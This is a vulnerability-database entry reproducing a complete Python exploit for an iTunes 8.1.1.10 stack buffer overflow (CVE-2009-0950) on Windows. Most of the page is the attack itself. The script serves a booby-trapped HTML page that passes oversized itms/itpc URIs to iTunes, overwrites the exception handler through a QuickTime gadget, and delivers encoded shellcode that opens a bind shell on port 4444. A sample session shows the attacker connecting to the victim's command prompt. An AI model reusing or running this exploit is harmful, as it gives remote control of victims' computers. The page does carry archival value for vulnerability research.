Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)

🗓️ 12 Jun 2009 00:00:00Reported by Matteo MemelliType

zdt🔗 0day.today👁 32 Views

Apple iTunes 8.1.1.10 itms/itcp Remote Buffer Overflow Exploit (win) is a python exploit that targets a vulnerability in iTunes 8.1.1.10 on Windows. The exploit triggers a remote buffer overflow by sending two URIs to iTunes, corrupting the stack and overwriting the SEH to take control of the EIP. The exploit is encoded to obtain pure ASCII printable shellcode and is triggered from Firefox, but not from Internet Explorer. It has been tested on Windows XP SP2/SP3 English, Firefox 3.0.10, and iTunes 8.1.1.10, 8.1.0.52

Reporter	Title	Published	Views	Family All 34
0day.today	Apple iTunes 8.1.x (daap) Buffer overflow remote exploit	14 Jan 201000:00	–	zdt
0day.today	Apple iTunes 8.1.1 (ITMS) Multiple Protocol Handler BOF Exploit (meta)	3 Jun 200900:00	–	zdt
Tenable Nessus	iTunes < 8.2 Remote Overflow	18 Aug 200400:00	–	nessus
Tenable Nessus	Apple iTunes < 8.2 itms: URI Handling Overflow (credentialed check)	2 Jun 200900:00	–	nessus
Tenable Nessus	Apple iTunes < 8.2 itms: URI Handling Overflow (uncredentialed check)	2 Jun 200900:00	–	nessus
Tenable Nessus	iTunes < 8.2 itms: URL Stack Overflow (Mac OS X)	2 Jun 200900:00	–	nessus
Circl	CVE-2009-0950	3 Jun 200900:00	–	circl
Check Point Advisories	Apple iTunes Protocol Handler Stack Buffer Overflow (CVE-2009-0950)	1 Feb 201000:00	–	checkpoint_advisories
CVE	CVE-2009-0950	2 Jun 200918:00	–	cve
Cvelist	CVE-2009-0950	2 Jun 200918:00	–	cvelist

======================================================================
Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win)
======================================================================


#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack  canary protection. Increasing buffer  size leads to
# SEH overwrite but it seems that the Access Violation needed to get  our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the  vulnerability from  Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10, 
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py 
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\Program Files\Mozilla Firefox> 

from socket import *

html = """
<html>
  <head><title>iTunes loading . . .</title>
  <script>
   function openiTunes(){document.location.assign("itms://itunes.apple.com/");}
   function prepareStack(){document.location.assign("%s");}
   function ownSeh(){document.location.assign("%s");}
   function ipwn(){
    prepareStack();
    ownSeh();
   }
   function main() {
    openiTunes();
    // Increase this timeout if your iTunes takes more time to load!
    setTimeout('ipwn()',20000);
   }
  </script>
  </head>
  <body onload="main();">
    <p align="center">
    <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>
    </p>
    <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>
    <p align="center"><b>www.offensive-security.com</b></p>
    <p align="center">
    iTunes starting... wait for 20 secs; if you get an error, click "Ok"
    in the MessageBox before checking for your shell on port 4444 :)<br/>
    If victim host is not connected to the internet, exploit will fail
    unless iTunes is already opened and you disable "openiTunes" javascript
    function.
    <br/>
    <h2 align="center">
    <b><u>This exploit works if opened from Firefox not from IE!</u></b>
    </h2>
    <p align="center">
    After exploitation iTunes crashes, you need to kill it from TaskManager
    <br/>have fun!</br>
    </p>
    </p>
  </body>
</html>"""

# Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode  is modified
# in order to obtain register alignment and to  reset ESP and EBP we  mangled
# before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444
# EXITFUNC=thread
# 
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
             "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
             "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
             "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
             "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
             "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
             "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
             "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
             "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
             "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
             "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
             "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1          = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 [email protected] w00t w00t
align           = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2          = "\x41"*570                                   

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret             = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp                                                               
align_for_jmp   = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
                   "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3          = "\x43"*162                                   

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1            = "itms://:" + "\x41"*200 + "/" 
url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
                               align_for_jmp + jmp_back + pad0x3 
payload         = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()



#  0day.today [2018-03-09]  #

12 Jun 2009 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.82109